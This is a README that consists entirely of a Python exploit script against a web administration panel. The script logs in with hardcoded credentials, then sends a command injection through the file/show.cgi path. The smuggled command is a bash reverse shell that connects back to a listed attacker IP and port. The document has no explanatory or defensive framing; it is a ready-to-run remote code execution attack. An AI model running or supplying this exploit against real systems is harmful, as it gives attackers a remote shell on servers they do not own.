README.md
Rendering markdown...
#!/usr/bin/env python
#usage: python3 web.py <targetIP>
import sys, requests, string, secrets
targetIP = sys.argv[1]
lhost = "10.10.10.10" #attacker IP
lport = "53" #listening port
data = {'page' : "%2F", 'user' : "user1", 'pass' : "1user"}
url = f"http://{targetIP}/session_login.cgi"
r = requests.post(url, data=data, cookies={"testing":"1"}, verify=False, allow_redirects=False)
if r.status_code == 302 and r.cookies["sid"] != None:
print("[+] Login successful, executing payload")
else:
print("[-] Failed to login")
sid = r.cookies["sid"]
def rand():
alphaNum = string.ascii_letters + string.digits
randChar = ''.join(secrets.choice(alphaNum) for i in range(5))
return randChar
def payload():
payload = f"bash -c 'exec bash -i &>/dev/tcp/{lhost}/{lport}<&1'"
return payload
exp = f"http://{targetIP}/file/show.cgi/bin/{rand()}|{payload()}|"
req = requests.post(exp, cookies={"sid":sid}, verify=False, allow_redirects=False)